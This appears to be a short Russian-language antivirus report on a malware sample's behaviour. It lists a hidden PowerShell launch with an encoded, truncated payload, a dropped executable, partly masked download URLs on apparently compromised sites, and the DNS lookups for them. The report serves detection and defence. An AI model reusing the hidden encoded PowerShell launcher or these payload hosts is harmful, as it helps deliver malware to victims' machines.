Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGUAcQBzAGgAdwBoAG0AZgBnAHgAdgBnAD0AJwBSAHEAdABuAHkAagB0AHMAJwA7ACQAUgB5AHYAbQBlAHIAcwBvAGEAegBlACAAPQAgACcAOAA0ADQAJwA7ACQAWQBvAHkAYQByAHYAaAB4AGUAbwBxAHMAPQAnAFQAYQBtAHMAeQB...
- %HOMEPATH%\844.exe
- %HOMEPATH%\844.exe
- http://ru######h-developers.com/Works/h24o-wo5-4470713/
- http://mo##s.xyz/wp-admin/ULSovayvw/
- http://pl#######1-site5.atempurl.com/calendar/qb8sy2al-t4x-396024704/
- http://dy#####securityltd.com/h5my/kXPorpZ/
- http://www.dy####csecs.co.uk/h5my/kXPorpZ/
- DNS ASK ru######h-developers.com
- DNS ASK mo##s.xyz
- DNS ASK hi##m.info
- DNS ASK pl#######1-site5.atempurl.com
- DNS ASK dy#####securityltd.com
- DNS ASK dy####csecs.co.uk